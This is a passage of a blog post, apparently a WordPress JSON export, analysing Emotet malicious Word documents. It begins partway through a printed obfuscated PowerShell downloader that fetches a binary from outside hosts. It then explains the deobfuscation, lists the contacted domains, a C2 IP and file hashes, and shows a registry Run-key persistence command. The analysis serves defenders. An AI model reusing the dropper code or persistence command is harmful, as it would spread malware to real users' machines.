$SHEllid&#x5B;1]+$shelLId&#x5B;13]+'x')(((&quot;{140}{80}{133}{44}{128}{45}{81}{74}{125}{38}{11}{0}{63}{18}{19}{130}{134}{109}{116}{41}{61}{15}{59}{9}{110}{21}{118}{52}{58}{17}{76}{4}{77}{14}{46}{27}{119}{78}{136}{121}{56}{68}{94}{7}{112}{12}{32}{35}{114}{1}{49}{108}{47}{42}{103}{62}{37}{126}{107}{143}{102}{88}{50}{30}{31}{5}{24}{91}{138}{16}{79}{66}{129}{73}{75}{70}{101}{22}{106}{113}{13}{57}{48}{139}{40}{131}{23}{141}{117}{90}{83}{142}{69}{10}{28}{135}{97}{43}{39}{123}{127}{34}{53}{86}{3}{95}{137}{65}{99}{8}{2}{36}{51}{82}{6}{84}{33}{29}{55}{111}{96}{105}{89}{87}{60}{100}{122}{104}{120}{85}{25}{72}{115}{67}{124}{93}{98}{20}{71}{132}{92}{54}{64}{26}&quot; -f'ctejc','b','oV','jc);f','adasd.n','\/','iZOadF','t','.uFDD','c) System.','oHejc + X','ejc+ej','.com','S96A\/ejc.S',' 2','ejc-obje','h-z',' = ',';XOaYYU =',' .','ejc)(XOaSD','Cl','.in','jc);XOaSD','@http','oej','ch{}}','XO','O','XO','com\/u0r','Q','\/qdM2\/','(','x','@h','i','ht','c','j','c@','jcwej','m.br',' + (e',' &amp;(ejcne','+','82133);','photo.co','it(e','ra','.','ZWn','ent;','ejc',';}ca','aasfc','ps','pl','XOaNSB','ctej',', X','c+','EiMr\/@',') random','t','fc in XO','ne','kej',':','ejc1','ttp:\/\/','C);b','c+ej','Unkf38\/@','jceejc+ejcw-obj','h','XOans','ext(10000,','X','o','ns','e','lV','ubl','IViZleuFD','v','+ejcee','D()','dievoigts','guF','p',':\/','ak','ce-Ite','\/\/fo','oreach(','oStrViZ','NSB','m','aADCX){try{XOaYYU','OaSDC)','marek','\/','\/yW','&amp;(','iViZN','\/s','p','sil','ejc+','Net.Web','.uFDT','ofolly','a','ttp:\/\/mais','c','e','aenv:','i','aADC','ejcIn','chtt',';','c','c+ej','e','t','.e','jc','.net\/S','(ej','e','re','adasd =','cne','a',' = ej','XOaas','\/g','j','XOa','C = XO','ic + ',':\/')).rEplACe((&#x5B;CHaR]117+&#x5B;CHaR]70+&#x5B;CHaR]68),&#x5B;STrinG]&#x5B;CHaR]34).rEplACe('XOa',&#x5B;STrinG]&#x5B;CHaR]36).rEplACe((&#x5B;CHaR]101+&#x5B;CHaR]106+&#x5B;CHaR]99),&#x5B;STrinG]&#x5B;CHaR]39).rEplACe((&#x5B;CHaR]49+&#x5B;CHaR]111+&#x5B;CHaR]72),&#x5B;STrinG]&#x5B;CHaR]92).rEplACe((&#x5B;CHaR]86+&#x5B;CHaR]105+&#x5B;CHaR]90),&#x5B;STrinG]&#x5B;CHaR]96) )<\/pre>\n<p>The &#8220;write-host&#8221; (<a href=\"http:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/write-host?view=powershell-6\" rel=\"noopener\" target=\"_blank\">http:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/write-host?view=powershell-6<\/a>) command-let is PoSH&#8217;s command to write something to the host and not pass the command to PoSH (hence why the PoSH command never runs when using &#8216;write-host&#8217;). Once that statement is run, the deobfuscated base64 command is displayed.<\/p>\n<p>From here we can see the calls to fotofolly[.]com and to maisbrasilphoto[.]com.br. The domain fotofolly[.]com is over HTTPS so nothing can be observed there. The call to maisbrasilphoto[.]com.br returns a binary as seen below:<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/05\/MZ.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/05\/MZ.png\" alt=\"\" width=\"1068\" height=\"783\" class=\"aligncenter size-full wp-image-1131\" \/><\/a><\/p>\n<p>We then also see a GET request to the following IP address over HTTPS: 74[.]137[.]102[.]161. Since this is over HTTPS not much can be seen here either. All I know is that once the malware was up and running for a while, I saw the process &#8220;markerswwa.exe&#8221; communicating with this IP over HTTPS.<\/p>\n<p>Lastly, we also see that persistence is setup via the registry: <\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nREG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run \/v markerswwa \/t REG_SZ \/d \\&quot;C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows\\markerswwa.exe\\&quot; \/f<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Quick post for today. Looks like some more Emotet maldocs. As usual, these two dealt with an invoice of some sort. While the sender is not the same in both instances, and the hash of the attachments are different as well, they both end up using the same URLs to download the malicious binary. For the artifacts, please see my Github repo for this here. IOCs: ===== 150.95.224.218 \/ fotofolly[.]com (HTTPS) 177.185.192.135 \/ maisbrasilphoto[.]com.br (GET \/yWEiMr\/) 74.139.102[.]161 (HTTPS) Artifacts: ========== File name: Payroll[1].doc File size: 120K File path: NA MD5 hash: 9166fbf7ad1ab5c1a5e23aa985f20d98 Virustotal: http:\/\/www.virustotal.com\/#\/file\/4042cf05a1f96d50cae7d92bb912250ca2ef91b205a119e111ce7065e3ebde13\/detection Detection ratio: 26 \/ 58 First&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=1129\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[12],"class_list":["post-1129","post","type-post","status-publish","format-standard","hentry","category-packet-analysis","tag-emotet"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1129"}],"version-history":[{"count":6,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1129\/revisions"}],"predecessor-version":[{"id":1138,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1129\/revisions\/1138"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}